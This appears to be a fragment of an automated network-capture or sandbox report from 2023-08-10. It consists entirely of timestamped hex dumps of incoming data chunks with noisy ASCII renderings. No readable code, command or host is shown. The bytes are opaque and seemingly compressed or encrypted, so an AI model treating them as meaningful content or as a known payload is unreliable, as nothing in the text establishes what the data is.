                                                                                                                                                                                          2023-08-10 08:17:30 UTC83INData Raw: 17 f8 c0 85 80 59 09 c3 62 5f 20 07 04 b0 0f df bb 35 14 97 b6 cf 3f 67 01 0e b6 fe 99 33 33 42 dd 97 3c b8 5e 62 1b 7c b3 55 bf ab 7c a2 c7 d7 2f d3 a8 28 8a 19 a3 df 88 d7 60 cc 22 d4 4c f0 09 2c 62 7c 08 54 62 8b 92 4b fd b5 6d 1b 4d b9 fd 03 b8 ce ec 08 92 1c ff c9 6c c8 b3 08 1d ea b4 07 81 5d 35 e1 a3 f7 e7 ef 00 4b 21 f1 2f c0 bb 56 72 d7 18 a0 5c e6 f3 9d 53 84 74 54 15 5a 67 14 b2 53 f5 ef e8 91 50 33 1f 43 31 dd 8f fe 09 8c ba e9 c7 a7 64 b2 83 ed c7 ec d5 c2 02 d0 1b a0 26 7c 2a 5a dc 3d fe 07 07 6e 38 ae e6 18 63 a0 b3 b7 91 01 86 71 87 e2 99 2c e3 2c 60 5d 8f 1e be 8f 1c 98 c6 3e 92 6f d3 1c b2 4d 6d 8b 3c 85 be 17 b5 db 2a f8 4d 95 06 e1 98 e3 40 f7 ea 74 d1 22 be b1 fb 6d d9 94 ab 85 84 44 f6 7c 72 d1 8c 6e f4 46 d0 05 9d a2 ac 55 b2 2c 9b
                                                                                                                                                                                          Data Ascii: Yb_ 5?g33B<^b|U|/(`"L,b|TbKmMl]5K!/Vr\StTZgSP3C1d&|*Z=n8cq,,`]>oMm<*M@t"mD|rnFU,
                                                                                                                                                                                          2023-08-10 08:17:30 UTC84INData Raw: 12 77 84 fa 29 e9 ad 2c 22 5f 98 d1 38 3a 96 db 92 d9 00 1e e3 ce f5 ef ea c8 6f b3 7f a0 50 c3 d7 75 29 d3 d5 19 9f b0 fd 1a e4 cc dd 14 c8 78 c5 5f 64 eb c0 4d a7 bc 47 4d 85 1e 24 d7 fd f5 50 d6 49 84 bf fe 35 1e 3c 82 b0 60 19 1c 29 e3 c1 9b 03 ef 7d 65 89 cc 10 43 d1 c2 54 72 29 3e 3e b7 87 c0 b3 f7 23 64 f6 fb 00 e0 47 9a af 6a 7d a9 b3 f2 1e 05 e9 dd 78 36 55 f9 af e0 3e 5f b9 12 a1 40 d3 f4 4e 34 eb 2c ae 35 b9 66 0d b0 5a 7a 59 fd 71 45 8b bd 76 1b 75 ab 78 f7 e3 4e 4b 08 07 e7 52 1b b4 91 60 92 c5 59 72 2d b6 b2 c2 3f 4c 0a b6 c6 2a de 2b 07 14 58 b8 e1 ea e7 01 c8 62 fd ee 74 90 be 8e 15 bc 08 e3 81 fb ca 73 1f 7a 61 f3 78 ff b8 ff 0c 06 62 2e e3 2a 0e e4 e9 99 fa 8d 39 d4 5b ca 42 f7 fa 9b 37 7f d2 0b ac dc 2d ca 74 8f e6 3c 5f b2 54 e2 53 09
                                                                                                                                                                                          Data Ascii: w),"_8:oPu)x_dMGM$PI5<`)}eCTr)>>#dGj}x6U>_@N4,5fZzYqEvuxNKR`Yr-?L*+Xbtszaxb.*9[B7-t<_TS
                                                                                                                                                                                          2023-08-10 08:17:30 UTC85INData Raw: ff 69 c5 a8 82 e2 6f e2 09 b9 7c 07 cb 77 19 56 61 1b 59 b7 80 35 3b fa d3 8e c9 34 28 55 48 df f0 3f d5 07 01 da 69 e0 e9 7f 52 80 b8 72 5d 53 77 7b c3 66 ba 6b 88 7c 07 ba 65 d3 e2 81 55 f4 2b 5c 50 b3 f5 1e cd 86 81 95 a9 44 7b 53 8a fe b2 06 b7 cc 0f 3e 7e 11 ee c1 ef 5c 9a 3b 03 53 ac fe d1 17 24 2c f6 68 c4 bd 00 c9 12 f8 86 38 a9 c3 ba ff a9 94 e0 d6 67 53 be 8e 16 74 e1 35 81 54 1a 84 8b bf 4d ea 17 da 61 56 06 ad e6 69 fb 2d 00 a3 53 fe 1e 3c 76 1c 1b b4 17 8e 36 ea 15 4a bc b6 6a 24 d4 d1 95 12 7d 42 30 97 6b c4 91 76 f7 87 1f 2d b3 e6 c8 fa b8 c1 3c 85 7c e3 e9 d4 2a fd 29 75 9a 6f 14 25 70 84 fc 11 d3 11 74 29 e8 5d 3e 9d 66 db cd 3c bf 96 b3 cb c1 18 92 12 f9 5b 6f 86 b7 5b 44 fe 56 11 8a 05 6d 24 23 33 21 59 a9 f9 1d 72 fc a8 37 38 c1 41 db
                                                                                                                                                                                          Data Ascii: io|wVaY5;4(UH?iRr]Sw{fk|eU+\PD{S>~\;S$,h8gSt5TMaVi-S<v6Jj$}B0kv-<|*)uo%pt)]>f<[o[DVm$#3!Yr78A
                                                                                                                                                                                          2023-08-10 08:17:30 UTC86INData Raw: 01 d6 25 b1 b7 e2 97 da 0f 51 e3 d0 98 7d 49 56 8a 79 62 65 16 3f 5f 14 03 a1 7b 67 9b 99 b2 14 82 e5 47 91 3e cf bd d6 a9 06 3e 3f ca db 29 7d 13 ee bc 18 5e 54 54 b6 ba fb e3 15 6e 25 2e 27 d3 db 3b 5b 74 96 ee 05 a1 35 47 9a b1 5d 23 1c 82 34 86 fc 42 c9 37 1e 1b 93 1f c3 f7 6a d8 ef 14 e2 44 91 b9 9d a9 f9 49 15 a3 1c 2b 6a f6 c7 e4 89 57 17 c1 d0 70 86 85 0b 49 d7 e8 ed c8 d4 92 08 a2 7e 07 31 c0 50 ae 4a ea 85 a1 a7 70 df fb e6 05 02 13 29 be c9 33 32 b3 09 dd 44 f2 8e 85 d1 f9 07 59 2f fd 75 f0 e9 bf 38 15 8e 96 80 9c 1f 50 b9 e1 eb 9f e8 d1 60 e0 c1 ca 4d e9 6e 34 ed 9a 66 f9 b7 d5 cd 7b eb 97 7e a6 50 71 88 2e 7b 7f 98 6b df bd e2 c3 11 8d d0 8f b0 4e 11 59 c8 f6 a7 b6 0c ea 18 00 b9 cc d7 1c 6d a1 af 6f 8c 78 d0 ab df 23 42 56 2b 8a 29 2e ae 94
                                                                                                                                                                                          Data Ascii: %Q}IVybe?_{gG>>?)}^TTn%.';[t5G]#4B7jDI+jWpI~1PJp)32DY/u8P`Mn4f{~Pq.{kNYmox#BV+).
                                                                                                                                                                                          2023-08-10 08:17:30 UTC88INData Raw: 3d 96 dd 17 d6 38 45 2f 6a 9f fa bb df 64 c8 d9 45 9c 18 f8 d8 6d e3 c7 ba 61 c7 2d b5 2a a6 47 d0 f7 9b e4 cb 8a 34 ec b9 2e 81 7f 1a 46 b9 71 d3 c1 c4 a9 4a 11 13 33 a6 77 ff 5f f1 aa a9 87 ee fa 01 ed e2 0d 1c 8d ab 0a f1 e5 e5 99 bd 52 9a 86 26 d1 5f 40 72 da ce 19 eb ac b2 db 8f 34 3d 79 7f de ee a8 84 99 72 69 48 b5 94 55 d8 6f 44 f1 c4 54 a4 77 a3 dc 65 4f 96 79 ef ff 32 b5 80 2c 07 1f 70 40 f7 fc e3 d6 dc 5d c7 58 df ed 77 8c 9a 87 ed 8f 0e 14 5e 37 b1 25 c3 f9 9b a4 ff 0f 0c 7d b7 c2 63 13 a3 cc c2 f8 21 73 3a dd fd 6a f1 c8 c6 7b 7e d2 8a 52 94 2b 97 dd 12 de 2b e5 60 94 2f 2e de 31 c2 f8 1a e9 77 67 8c 17 12 28 26 74 77 21 f7 30 8d 17 60 56 65 c0 dd 1c c2 da e3 67 9b 8f 24 48 4d 50 da ae 0c d3 0d 86 fc 5b 6f dd 6d 9b 2f 5c a2 35 00 de 73 d4 13
                                                                                                                                                                                          Data Ascii: =8E/jdEma-*G4.FqJ3w_R&_@r4=yriHUoDTweOy2,p@]Xw^7%}c!s:j{~R++`/.1wg(&tw!0`Veg$HMP[om/\5s
                                                                                                                                                                                          2023-08-10 08:17:30 UTC89INData Raw: e5 07 9c 13 4b ed 58 8b 02 c7 2c 12 c5 8a ed e8 d4 8b e7 7b c8 65 ca df 7a 5f 3c a1 cd fe 2b 41 2b 90 87 a8 88 39 b5 b0 b2 90 07 80 7f 80 80 c8 85 40 71 41 ee 94 6e be bb e3 9a 53 b5 b8 d2 78 6c 09 17 d9 59 db d3 64 4a 56 1b 20 3e 8b 01 f4 56 28 b3 e6 9d cd 29 2e f8 40 1d 0d ff 32 de 01 0f 3d ab ac 19 8e f3 ed 65 a6 d0 d8 a4 b3 91 ec 0e 99 4d a2 f4 c0 db 4c 6e 73 13 6d a6 56 03 90 d4 05 cc 14 ae 76 9c 57 ea 6a b0 0b b4 ac a5 57 e5 67 d4 4b c1 8a a9 09 80 b8 4f 66 c5 a5 70 9e 63 cc 74 63 fc 5c 30 21 32 4e 66 d9 7f 2b 93 c8 b0 9e 91 f3 eb f3 08 46 8d 9f 1e da a0 1b 5a 97 16 bd 69 75 17 39 58 5f 81 fb 8f ba 9e 39 b8 aa 71 d0 39 27 56 fc 35 02 70 24 e1 48 ec 3c a2 05 b1 7d 64 bc ea 01 fa cd 15 33 70 ad df 65 97 4a a7 63 63 25 d2 c9 bc c5 32 9a 9e 41 8f f4 99
                                                                                                                                                                                          Data Ascii: KX,{ez_<+A+9@qAnSxlYdJV >V().@2=eMLnsmVvWjWgKOfpctc\0!2Nf+FZiu9X_9q9'V5p$H<}d3peJcc%2A
                                                                                                                                                                                          2023-08-10 08:17:30 UTC90INData Raw: 69 ea 88 df 83 b8 85 c9 e9 68 c2 90 b4 e0 e0 99 c7 1e 17 1a 62 f0 3f 63 5b e6 47 c3 75 d2 ea ed 66 a7 df 7e cb 68 23 d3 6a c1 7e 2b 33 a4 fc 46 06 a8 91 29 69 8b b8 2e 0e 2a 7d d9 ba d8 5f 4a 6d dc 49 a2 4a bb 85 84 0e 1b bc 94 e1 ab f0 75 fd e7 b6 93 8d 84 28 bf fe 5d 66 3b 00 e5 cb d8 b5 a0 e5 09 d1 93 2a ad b7 5b 31 5d 27 b7 e1 5f f7 be e6 6c 4c a7 66 e4 e7 5c 5a 9c 09 67 0e 2c 1a 6d 86 27 1b 56 11 2d b6 53 6d b5 71 11 6e 3a 1c 2f ac 22 52 8f 2e 77 ba 91 be 49 7a 5c 83 df 7a 37 95 33 fa 90 ee b7 b3 20 9c 41 20 5a d5 fa 50 fb ba 5f e3 08 0f 49 6c c5 7f d7 fe b0 c2 d9 55 c9 e9 21 61 6f 66 aa d6 c4 44 48 2f 8b e4 4a 7e fa 40 b9 8e b8 8e 69 e5 21 d1 30 87 f6 12 33 ed 53 c2 6d 22 92 f9 65 65 83 b4 f0 56 08 6f 74 e7 2b d7 00 ff 36 45 94 61 b5 7f 1d 09 de 2e
                                                                                                                                                                                          Data Ascii: ihb?c[Guf~h#j~+3F)i.*}_JmIJu(]f;*[1]'_lLf\Zg,m'V-Smqn:/"R.wIz\z73 A ZP_IlU!aofDH/J~@i!03Sm"eeVot+6Ea.
                                                                                                                                                                                          2023-08-10 08:17:30 UTC91INData Raw: b9 fd d6 a2 71 d8 a7 b1 54 37 45 ed 7e 2a 22 bd c2 28 8d ff b6 92 64 8c bd ae c9 c2 c4 c4 46 89 86 36 64 88 b3 e8 60 8b 97 94 12 1b 4e f4 36 a4 da 4e eb 28 e6 f5 07 89 2f bc 19 ad 58 21 e0 af cb 40 9e 1f c9 1a c6 0d 0b 49 25 f5 7e ef 00 57 82 33 e2 ea 19 58 5a 38 ac cd b2 64 df 57 27 de 74 ab 83 9a c4 f4 c8 15 ff f9 ee 58 4c 40 e6 c8 1f b1 b9 9c 35 0c 61 0a 07 0b 7d f2 db bf ac 0c 12 70 84 e2 1e 41 a4 16 60 63 ce 9b 5d 53 7d 75 d9 26 09 07 1f a3 42 6f 0c f1 8b 4e 6d 4b 9c 7d 7d 0d 3a 36 73 2d 09 5d 8c 0a 95 d8 1b df f6 13 5e fd f1 cb 71 12 13 49 58 15 1e da 49 c7 e4 08 49 7b 24 8e 9d 91 29 f0 cd 91 71 f4 ba 93 a0 ff 5e 5e 6f 49 11 b2 99 d9 14 be 87 8c 96 22 f4 1a fc e7 12 d1 72 c9 ba 0e 06 a5 8c 89 54 49 56 5e 64 51 28 22 2d c7 c5 17 74 8f 14 2e de 45 ad
                                                                                                                                                                                          Data Ascii: qT7E~*"(dF6d`N6N(/X!@I%~W3XZ8dW'tXL@5a}pA`c]S}u&BoNmK}}:6s-]^qIXII{$)q^^oI"rTIV^dQ("-t.E
                                                                                                                                                                                          2023-08-10 08:17:30 UTC93INData Raw: 1c 9d af 05 47 e8 c1 da 9d ca 37 c5 9c a2 7f 3d 0a e3 9d c6 25 44 0d 5e fc 59 3c 1f 5b 02 83 de 38 cb 1b 4d 77 3e f9 73 73 e6 64 17 00 c7 db 81 68 5b 21 55 ac 56 c5 8c a9 d3 c6 26 05 a8 91 ff 69 48 6e 1e f8 45 04 b1 4d d9 56 fe f2 7d 92 87 0f 7d bb 63 14 c3 c3 60 6a 4c fb 11 e9 a3 e1 78 47 00 ce 00 88 f8 95 aa 2c 83 e2 4c ca 97 10 cd 1e 4e 33 eb 7f 93 7a 49 04 b3 cb d4 c0 50 7f 42 ed 8a aa 8e ec 83 77 dc b6 cc 8b 76 bc d9 73 2f a7 e5 d5 e1 ef 0d 23 64 ad be fd 16 7f 96 ef 14 d0 78 9b 87 9c c7 69 ff b8 58 73 5d 53 b3 2f 57 96 70 9f 16 b1 d3 3f c3 a8 3b 01 e0 b6 36 de 5a 08 eb c3 5d 11 e7 63 2c a1 8d 39 41 d0 b8 32 e4 62 a7 d1 bc 13 46 d0 2b 94 44 bd 0a 6b 20 15 cd 7d cf 3f 29 6c e5 21 d2 20 81 52 3e bf 66 d3 7c d5 13 a0 a9 59 30 b5 b2 53 e6 0e e6 65 1d 64
                                                                                                                                                                                          Data Ascii: G7=%D^Y<[8Mw>ssdh[!UV&iHnEMV}}c`jLxG,LN3zIPBwvs/#dxiXs]S/Wp?;6Z]c,9A2bF+Dk }?)l! R>f|Y0Sed
                                                                                                                                                                                          2023-08-10 08:17:30 UTC94INData Raw: c6 93 bb a6 ba ed 7a 25 38 82 cb 84 78 ff 2b 0a 59 4e 3e 6c 23 bb 22 a8 a9 87 46 29 dc 1b 95 8d 60 1b 21 40 ae 12 3a fa 13 5e 64 25 a7 49 52 77 d4 6e 8c 19 b8 56 87 5b b2 ae 77 47 e0 f7 65 fe ed e1 c9 4d 40 9b ac d8 73 19 db 81 f5 ef 09 70 1d 8c 58 ce 5e a4 da 84 26 76 f1 f1 f6 78 ac aa 3e 1e 3a 4f c5 29 ac 82 0e 9f b0 0f d0 86 05 31 15 8c 9b ad 25 c5 ba d5 d5 e3 7b 2b 7c d6 86 bf 88 b4 f2 8b 46 18 cd 51 f0 12 a3 9f c5 12 f2 7f 7a 05 75 56 c1 19 1a 6f 5b b7 41 0e 39 5a 61 dd 7a 6f a6 e0 c1 33 34 4d 79 59 eb c7 2d 40 2d e9 cd 71 88 f2 7d 35 77 2e d1 2d 8f 80 a8 04 47 d8 7c 7f 46 e4 03 8f fb 1a 81 1e d9 30 1a 53 10 49 6d 47 24 a7 16 b3 23 4d b2 0d b4 35 b4 73 8a f4 6d e5 26 1a 4b 98 13 ff 6e 39 bc be 4b dd 8c 61 11 53 4b 2c 67 dc ee 72 08 9a ef a3 94 38 47
                                                                                                                                                                                          Data Ascii: z%8x+YN>l#"F)`!@:^d%IRwnV[wGeM@spX^&vx>:O)1%{+|FQzuVo[A9Zazo34MyY-@-q}5w.-G|F0SImG$#M5sm&Kn9KaSK,gr8G
                                                                                                                                                                                          2023-08-10 08:17:30 UTC95INData Raw: 51 28 ec 4e e5 21 b5 9c 4f aa 17 84 39 58 4f 96 5c a2 0f 4a c3 c9 76 87 b2 41 d5 bc d7 fe 42 84 24 ee 90 c9 94 df 47 e1 b2 e1 f0 f4 4d 81 15 b8 c6 10 e5 64 c2 f2 36 db f0 98 88 96 d1 85 e4 10 05 aa 57 86 f7 20 c6 c9 a9 e5 94 20 8f 79 9a 9b 4b cc a4 af b0 4c 6a 93 cb 74 e2 ca eb 4b a7 14 86 56 4c 1d 1f 53 7b 42 40 d6 8e 84 d2 22 d4 aa a4 40 fb 8f 28 f4 3a fd 14 f1 0a e5 d5 42 88 ea 96 7a 97 0d 0a e0 f5 02 39 49 4e 1d 56 85 b9 ee 68 08 13 97 b5 ce 22 93 b8 85 6a bd 52 32 10 c0 6f d6 55 48 3b 4c 19 fa c5 6f 23 d2 b5 87 ee 0a 59 08 53 75 91 b1 fa 35 53 09 50 a4 42 ef e9 ce ee 19 35 03 64 55 fd 4b bc b5 fb 8e 06 0f e3 a5 23 98 da 04 06 06 10 83 54 ff 6a 6a 3b d1 30 e7 73 9a 5b 92 cd 7d db 14 ca 5d 49 2f 2c 03 f7 a1 e1 2c 13 ff 26 5f 9f 4f 6c 0d 8a 5b 11 2a 68
                                                                                                                                                                                          Data Ascii: Q(N!O9XO\JvAB$GMd6W yKLjtKVLS{B@"@(:Bz9INVh"jR2oUH;Lo#YSu5SPB5dUK#Tjj;0s[}]I/,,&_Ol[*h
                                                                                                                                                                                          2023-08-10 08:17:30 UTC96INData Raw: ae e6 2c fd 78 42 99 0b f1 87 73 95 f0 5c de 33 cf fd 33 68 13 8e 35 60 bc 99 9a 1a f0 30 c0 bc 0d 0b 36 9e c7 2a db 4b d7 4b f1 56 82 d5 80 76 36 78 5f f4 28 ef 6c a6 d0 19 cb 0f 67 84 d3 52 1f 0e c6 f3 bd 59 88 13 3f 57 2b 20 d4 11 46 4e 23 4d 86 82 4e ce 55 34 c9 e4 93 f1 69 f0 db 28 96 05 36 9b 30 8c f7 61 31 70 29 79 e9 74 51 2a b1 aa da 08 40 80 4c 90 03 ec e2 e4 b0 f3 f2 1b 1c a5 3f e0 33 e3 21 a7 8a 36 7a 07 3c 2f b9 e7 9a 9c 82 37 0c 1c e3 5f 9b a4 43 5d 08 ac 22 c1 8b 3b af 32 05 5e 5d 16 ec a3 7d 09 e9 34 4b 3f df 44 b8 91 04 1f d5 b5 06 72 5c 41 f9 5c 36 5d 86 09 00 4c 58 06 33 5f 78 8c b9 b6 97 e0 e7 28 d8 df 51 0a 4e 4e b1 42 dd f0 20 54 cb 17 2a f3 7b 59 c2 75 6e af 56 da 73 44 51 20 1b 28 78 17 a4 7d a0 67 08 55 10 e3 c8 79 7e 40 d6 d0 bc
                                                                                                                                                                                          Data Ascii: ,xBs\33h5`06*KKVv6x_(lgRY?W+ FN#MNU4i(60a1p)ytQ*@L?3!6z</7_C]";2^]}4K?Dr\A\6]LX3_x(QNNB T*{YunVsDQ (x}gUy~@
                                                                                                                                                                                          2023-08-10 08:17:30 UTC97INData Raw: 51 43 fa e5 71 26 eb d7 af db e8 79 f5 68 87 86 cc 63 9a 4f 0d 61 56 c2 1a d3 56 85 08 64 c7 29 6a b0 fc 64 cc b8 a8 f0 47 76 b7 de 2c d0 01 a8 34 98 41 a3 84 a5 47 bd b2 cd 46 60 c0 7c 40 9c 9b 03 3e d4 3c 1a 3a 4e 17 b2 7d cd cf 8b f0 26 d8 27 80 e0 3e 1c ab e9 9a 58 29 5c 89 f4 2c c9 74 42 2d f9 10 77 8a a7 9a 02 10 90
                                                                                                                                                                                          Data Ascii: QCq&yhcOaVVd)jdGv,4AGF`|@><:N}&'>X)\,tB-w
                                                                                                                                                                                          2023-08-10 08:17:30 UTC98INData Raw: 79 25 a0 35 15 4c 36 8d ff 6a db aa 1a 13 6b e9 42 7e e9 c8 29 c7 d4 e7 66 f7 76 12 66 4b a0 11 5d 58 51 9a c5 91 f5 c1 81 81 70 0f b9 a8 35 85 b5 20 46 5a f0 1e 22 ab 6c 51 ab 74 56 be 61 fb 00 42 ca da 83 10 c8 dd 67 92 9e 0b 13 51 24 47 03 2a e2 72 3a 06 81 d2 66 a5 15 eb 48 8e d2 e3 17 97 8e 20 05 8c 01 cc 23 2b 67 78 f7 00 56 8d 47 94 07 4b 6f 75 a9 b6 4b 0e 80 64 06 3d 77 7a d7 0f 67 c8 52 e8 cb 52 b4 9c 06 a8 03 97 2b e3 58 53 0e fb f8 b9 95 8f 17 9b ec 1e 5f 02 c2 a8 93 ea d2 f5 e5 09 b6 98 f0 87 2c ea ec 27 37 f2 d8 c5 62 a3 6d 3e 61 ea 3c 0a 40 99 c6 f2 49 26 f8 90 a3 1f 06 5d 1d 9e 6c c5 50 5c 7b 25 16 c3 05 ca 51 b2 f4 5f dd aa 20 d9 f8 5f 44 fb eb c9 89 b1 6d bb f4 dd d9 be 16 73 4f 8e b9 f2 65 e9 39 eb 08 75 fb 40 6c 0b ce e3 d9 10 70 f4 3f
                                                                                                                                                                                          Data Ascii: y%5L6jkB~)fvfK]XQp5 FZ"lQtVaBgQ$G*r:fH #+gxVGKouKd=wzgRR+XS_,'7bm>a<@I&]lP\{%Q_ _DmsOe9u@lp?
                                                                                                                                                                                          2023-08-10 08:17:30 UTC99INData Raw: 11 b2 fb 28 be 52 24 e4 10 1b 98 7a 38 4d f3 d3 3f 57 0f ca fc f1 81 32 42 66 f9 08 e4 4f 21 6e fb 3d a1 aa 17 1c 05 96 e4 53 3c d3 cb 5c 57 ff d4 45 ab 79 aa eb 89 a2 5c 60 71 d8 b4 8b 9f 97 e3 f7 49 b2 8c 37 ac 84 72 b9 29 7f fd 26 eb c4 e8 60 e3 80 3c 6b 57 45 77 76 fc 53 20 7c 98 11 b8 f7 48 c8 8e 5b 8e c6 11 2d 93 6b 06 4b 00 c4 4a be 65 32 79 92 bc db 02 73 19 c8 81 01 81 c5 49 84 7a d8 12 0e c8 f7 0f 33 92 12 79 75 10 64 70 33 5e 97 fd 4f 98 5f 05 ae 46 be ed 9f 8b 16 ae 8b 4d 01 11 ef 9f 8c 2f 18 20 69 da 3e ac 9e 86 a6 87 2c 08 64 65 be 07 3c 7a 5f 3a b4 bb 68 e5 90 f6 c6 c5 d5 67 3c de a2 10 39 62 76 f0 1d c8 28 c8 36 ef d8 a0 fd 2f 23 0a 31 2d 09 21 d1 b4 3a c7 e7 7a 95 c8 0f b4 98 85 e2 20 4a 0a c8 7e 5c 9d 53 ab cc 5d 11 ff 49 aa 00 9e 1f cb
                                                                                                                                                                                          Data Ascii: (R$z8M?W2BfO!n=S<\WEy\`qI7r)&`<kWEwvS |H[-kKJe2ysIz3yudp3^O_FM/ i>,de<z_:hg<9bv(6/#1-!:z J~\S]I
                                                                                                                                                                                          2023-08-10 08:17:30 UTC100INData Raw: a6 76 8b a5 f6 1d 54 be 07 be 05 d9 dd f3 0b bd e0 c0 f1 a5 51 6f ba 7a 37 c8 55 25 f9 60 bc 6c d5 de 23 70 4f d9 18 55 54 45 9a 4a 2c fc 5f ea 60 39 5d 6d a3 6f 5e ab ee 4e ce 1d c3 e3 f5 13 5a 6b e7 97 b3 0a e2 94 1a 69 27 7b 4b bc c3 00 9d b1 eb ed bf 99 a1 2c d2 48 24 66 e2 8e 36 83 af c2 ab df 51 62 fa 1f d4 40 95 03 9c 25 cb 55 7a 46 a6 5b a3 0e 2a 35 4b a5 06 c2 c4 15 1b 6f fa 2b db 24 17 a9 81 d7 1f 8c 3a 5b b5 ca 4f 9d a4 b1 31 b8 77 fe b3 97 54 02 df 2f a8 0e 79 da 1f 46 0a ec d5 d7 66 d9 1d 56 e5 81 b0 c6 2c 84 fd e9 d3 b1 e1 cd 1a 15 89 e7 3d 96 2d 57 cb ef 05 1c 44 fb a5 e8 f0 63 a1 a0 d2 6a 34 d7 c1 3a ea 63 79 c7 dc 55 93 55 fc 93 92 b9 1d 5a 78 5c 11 50 a9 4f 85 86 89 62 34 5f 69 99 92 ab 72 d2 51 43 f7 aa 9a e1 9e ea 2e 8c 23 ae 56 cd 0b
                                                                                                                                                                                          Data Ascii: vTQoz7U%`l#pOUTEJ,_`9]mo^NZki'{K,H$f6Qb@%UzF[*5Ko+$:[O1wT/yFfV,=-WDcj4:cyUUZx\POb4_irQC.#V
                                                                                                                                                                                          2023-08-10 08:17:30 UTC101INData Raw: 83 09 84 5b 80 06 dc 97 6f b9 6b 30 21 27 6a 8d f0 6b a8 53 36 0f 9a 28 97 6b 21 15 ce cf 43 9f 4a a2 90 90 78 a3 57 ac 11 23 e6 b3 2b 08 bb f4 e9 de 45 80 47 71 7d 8d 25 e4 f8 d5 66 f1 ef 0b 3b e7 64 83 b8 88 77 31 d7 e5 d3 d3 27 3a 02 3d ad 15 4a 3a 34 f3 32 21 22 ea 2f ca f5 e5 fa 4c b7 23 99 c5 3c f7 7b b4 ba 69 66 0a 67 4e 8c 4d 1d 67 bd 18 2f cb 29 58 d5 48 b9 06 1e 1b 0f 42 12 c4 58 83 ec 9e fe 02 0b 76 8e 56 ce 79 8f 7c 0e 46 13 f2 df 66 ae 4e d7 d8 b4 08 4d 96 a7 03 38 74 bf e5 9c 25 3a 4c 29 18 9d 56 6c 8c 97 5e ae 96 f2 69 ab d6 df 91 82 36 d7 84 a4 6b 32 b5 35 8c 84 92 81 1e ac 76 4b b6 42 e4 4b 18 c9 42 10 6e 78 da 74 31 07 1f da 4a 1f 4c 03 c1 d0 d4 85 e5 5c 05 c3 3d d4 db 82 2d 29 d2 ce 06 5a e0 40 67 d5 3e b6 f2 d7 d2 7a 3a 22 dd cc 09 8d
                                                                                                                                                                                          Data Ascii: [ok0!'jkS6(k!CJxW#+EGq}%f;dw1':=J:42!"/L#<{ifgNMg/)XHBXvVy|FfNM8t%:L)Vl^i6k25vKBKBnxt1JL\=-)Z@g>z:"
                                                                                                                                                                                          2023-08-10 08:17:30 UTC102INData Raw: a4 9f 30 61 57 1b 7f 4f 28 1e 1d 71 9d c3 db 34 27 1d 06 3e 53 50 22 49 d7 a2 be ca 0f b9 25 b4 0a f4 77 6e 18 c4 b3 3b 15 31 46 b4 ce 88 a3 7b f9 92 f8 ed 07 fe b5 ed 80 48 e4 48 4e 34 26 4b db d5 80 a9 aa 88 00 9b d4 19 62 ce 89 a1 74 a2 a5 96 f3 bd 5d ff e5 1b 26 8a 2f 50 0a c8 19 8f 1b 44 5b 15 9a ed 33 e9 66 0c 73 88 a6 0a fe 1d e6 95 41 40 1c 8c 7c f6 a7 eb 8f 68 5d 30 49 27 90 f7 f2 47 d3 60 f6 b1 a8 56 18 e0 b1 e7 9a b3 e1 c4 8f 14 f2 3d 2e 34 26 f5 37 1c 09 aa f0 03 3a 9b 70 d6 cb e3 99 b1 9f 2d 8f 27 e0 84 42 f6 7c d1 2c 28 e9 b5 da 2a a8 8a ff d9 20 f5 d2 57 92 11 03 7b a4 e3 ba 65 f5 3c 95 25 65 21 ea 8b 77 df a6 8e 7f 80 ee 27 5a ff 1a f5 de 70 c7 3f 24 e6 31 75 0c 38 c0 67 70 13 ac 0f 19 b6 47 22 7e 42 3e 51 32 bb 33 33 cd 4e 52 78 cd 15 15
                                                                                                                                                                                          Data Ascii: 0aWO(q4'>SP"I%wn;1F{HHN4&Kbt]&/PD[3fsA@|h]0I'G`V=.4&7:p-'B|,(* W{e<%e!w'Zp?$1u8gpG"~B>Q233NRx
                                                                                                                                                                                          2023-08-10 08:17:30 UTC104INData Raw: 54 0b 2b 94 e7 71 eb d7 73 28 a6 bf a2 25 a1 f4 8a 68 2b 91 34 05 47 ad 19 b3 78 d4 5d 59 31 43 eb e3 d6 d3 f3 2e 26 ce 08 d2 06 76 a2 ab f5 75 47 17 4d ea eb a2 c1 5e 5e 2c 77 e8 8b 9c 18 c8 1d 49 0f e7 ca 70 bd 1a c0 66 10 3e fa 0c a9 96 74 1e 40 dd c5 c9 d1 67 3f 71 47 ed c7 87 30 9f aa 14 38 ae 6d 4d 03 27 44 32 fc fd 26 7f 21 c3 52 87 97 75 c7 14 f0 51 1c c2 62 ad 5b 22 46 28 44 24 54 bb 29 ea a2 77 51 d1 6c 12 e5 37 a7 ba c4 3e ee b6 4a 65 05 96 06 dc be 0e 46 f1 c6 96 db 40 af 6d e7 cb 03 e9 be 61 a8 1b 03 76 42 24 9f da d0 ff 8a 8d 0d 77 fa fb 22 27 75 eb 79 21 e2 bd 99 d9 53 2a 04 67 a1 92 66 d4 12 74 29 ef d7 a7 c4 aa 1d 17 9a ea d2 03 c6 26 1b df b3 d7 55 81 80 5b f1 5a 60 c0 47 aa 42 19 f2 4a 06 52 58 45 b9 c7 84 68 62 c4 f4 ce 91 3b 97 81 f8
                                                                                                                                                                                          Data Ascii: T+qs(%h+4Gx]Y1C.&vuGM^^,wIpf>t@g?qG08mM'D2&!RuQb["F(D$T)wQl7>JeF@mavB$w"'uy!S*gft)&U[Z`GBJRXEhb;
                                                                                                                                                                                          2023-08-10 08:17:30 UTC105INData Raw: 04 d7 8d 54 12 a5 64 4e 35 7e fc 11 59 6f ca 05 68 c9 56 40 ed c3 cb ae 22 bb ae ad f4 86 24 fc aa 24 22 1f 6b 5d 27 2e 7a 4c 17 de 53 61 c5 bb 86 69 c0 f8 03 30 a3 d0 3b 1c 92 02 ef 76 73 39 e3 d0 c1 a7 2b 67 91 1f 3f a4 93 1a f5 97 dc 06 23 9b 89 23 8c f4 f9 83 75 dd f0 7b 12 7b 39 14 f6 24 33 34 85 6a 3e a0 fc 69 50 25 23 23 70 49 81 7b d1 fb e8 13 cc a9 5c df 4b c0 a6 b9 f2 78 27 1c 9b 9c fc f6 15 af d9 c5 59 34 72 24 80 6c 54 3c 44 f8 72 0f 40 9d ed 6c a5 59 5f 4f c4 6b 0f c5 7f cb ac b6 22 df 9b 2b 40 ba 0c 5d 64 27 87 48 0c 29 8c 36 65 f0 18 46 4c 9d 45 88 bd 2c 13 e4 dc 46 bf be de e0 81 a3 f4 bc 0f 33 32 3c bd f4 14 2c 82 8d df f0 20 de 11 46 38 4d d0 20 97 32 c1 20 e6 c5 fb af 0b 03 4c 8f fa b5 84 8c 83 08 57 af c4 9e 75 06 1f 3c 90 b3 be 34 5b
